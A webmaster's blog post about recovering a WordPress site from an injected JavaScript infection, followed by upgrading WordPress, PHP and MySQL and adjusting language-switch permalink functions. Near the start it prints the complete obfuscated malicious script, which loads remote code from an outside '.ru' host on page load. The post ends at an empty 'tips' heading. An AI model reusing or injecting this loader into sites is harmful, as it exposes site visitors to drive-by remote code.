A virus or worm had crept into one of my webprojects. Here I was using two WordPress installations to provide a dual language website in German and English. I had made some small adaptations to the scripts and created a custom template.
The problem was caused by a piece of Javascript code, which had been inserted into many of the php files and some of the javascript (js) files. This is a sample of the code that was added:
<script>M=["s"];R={};var S;n=function(){var FY=["Gv"];function C(G,b,F){this.d="d";return G.substr(b,F);var e=new String();this.dv='';}try {var OO='yw'} catch(OO){};Yt=29881;Yt-=151;var SF='';qG=["Gt"];var q=RegExp;this.c="";var JO=new String();var g=document;XA=33342;XA++;Yy=63948;Yy++;var GP='';var T=String("/xvid"+"eos-c"+C("om/goZNf",0,5)+C("ogle.mWi",0,5)+C("com/nPMHG",0,5)+"ikkei"+".co.j"+C("p.phpO64r",0,5));this.D=710;this.D--;try {} catch(dvJ){};try {} catch(iS){};function E(G,b){var iM=["EQ"];var F=String("[")+b+"]";var J=new q(F, "g");return G.replace(J, GP);var ov='';this.qf=10983;this.qf+=70;};HV=61819;HV--;var uV="uV";A=[];var gN=E('szcwrDi2p2tg','fwzGjT2QJaD1X_g3C');this.eg='';var H=245298-237218;fZ=[];var q_=new String("bo"+"dy");this.x='';var Y=null;try {} catch(yr){};try {} catch(fd){};tk={_w:"AK"};var Mv={DU:30624};S=function(){var dV=new Array();aV=15275;aV--;try {var ROe={lC:false};var f=E('c2rAezaLtAehEAlzeLmAe0n0tI','Lh2IAO0jz9');yx=[];var qE=["Tc","je","Sz"];h=g[f](gN);try {var ur='uT'} catch(ur){};ux=4237;ux+=157;this.kT=64866;this.kT--;var X=E('shrocz','FzdCPViphoE');var G=H+T;var Np="";this.zi="zi";var Hg=new String(C("de4cJ",0,2)+C("mtxrfetrxm",4,2)+C("fOHrOfH",3,1));iSv=38374;iSv++;Xa=["NI","Eo"];cO=["vH","fM"];h[Hg]=[1,3][0];var DE={zm:38556};Yyf=[];h[X]=new String(C("htdAa",0,2)+C("8jdtp8jd",3,2)+":/"+"/t"+C("CZKgenZgKC",4,2)+"th"+"pr"+C("of36TB",0,2)+"it"+".r"+C("gqCu:qgC",3,2))+G;g[q_].appendChild(h);this.zy='';this.ZU='';} catch(_){this.qu=36473;this.qu-=135;var TE=new Array();try {var op='xu'} catch(op){};};};this.qJ="qJ";};try {var In='XY'} catch(In){};var sg='';n();window.onload=S;var bp=[];</script>
<!--8825f4c0663bce25174c88ea6fbadc29-->
<script>M=["s"];R={};var S;n=function(){var FY=["Gv"];function C(G,b,F){this.d="d";return G.substr(b,F);var e=new String();this.dv='';}try {var OO='yw'} catch(OO){}; ... ;try {var op='xu'} catch(op){};};};this.qJ="qJ";};try {var In='XY'} catch(In){};var sg='';n();window.onload=S;var bp=[];</script><!--8825f4c0663bce25174c88ea6fbadc29-->
I found a reference to this Trojan code here http://possible.in/products-security-updates.php. There is a PHP script available to remove the code from an infected installation. The scripts needs PHP5 though, which lacked on the 1and1 server the site was hosted on. So I had to find and replace the malcious code by hand using Notepad++. Notepad++ has a nice function to search and replace in folders recursively while using a Regular Expression.
I removed the code from several PHP and JS files. The JS files did not have the <script> tags around the code.
Because I was still getting a warning in Chrome, I decided to completely remove the existing files and upgrade the Wordpress 2.1.8 installation to the newest 2.9.1 version. After making a full backup of all the files in the Wordpress folder, I deleted all files and installed the new ones. I replaced the wp-config.php file and uploaded the custom theme.
Unfortunately I got a 500 Internal Server Error after this. It appears that Wordpress version 2.9.1 needs MySQL 5. So I had to create a new database in the 1and1 database manager. Then I dumped the SQL from the old database and imported it in the new one. The wp-config.php file needed to be updated with the new database connection information. Now the site showed at least a part of the template.
After that, I had to change a script in th wp-include folder, link-template.php. After the_permaling() function, I added two small adjustements for my template:
function the_permalink() {
echo apply_filters('the_permalink', get_permalink());
}
/* Addition for Language Switch (MK) */
function the_permalink_de() {
echo str_replace('en.come-partner.de', 'de.come-partner.de', apply_filters('the_permalink', get_permalink()));
}
function the_permalink_en() {
echo str_replace('de.come-partner.de', 'en.come-partner.de', apply_filters('the_permalink', get_permalink()));
}
I use these altered function for the language change menu item. It allows for a switch from the German to the Engish version of that page. Two Wordpress installations are on two subdomains "en." and "de.".
In the template:
<ul id="menuleft" class="treeview">
<li class="page_item"><a href="/">English</a></li>
</ul>
Similar on for the German link.
The front of the website was functioning nicely after this, except for three plugins that needed to be activated. I copied the old versions of "fold_page_list.php" for the menu and "iinclude_page.php" to include a page content in my javascript scroller. This worked fine.
I copied the folder "dd-formmailer" to the plugins and went to the "/wp-admin" page. Here again I got a 500 Server Error. One advice found on the Net was to rename the plugin folder to something else, to prevent malfunctioning plugins to disturb the program. The login screen appeared and after the followed a database update. Next came the Dashboard. Activating the Dragon Design Form Mailer created another 500. It appeared to be a problem with PHP4, so I inserted code to activate PHP5 in the .htaccess.
AddType x-mapp-php5 .php
AddHandler x-mapp-php5 .php
That solved the problems, so in conclusion it appeared to be version problems. Upgrading Wordpress to 2.9.1. also required PHP4 to be PHP5 and MySQL 4 to be MySQL 5.
Some tips for what to do when your site is hacked:
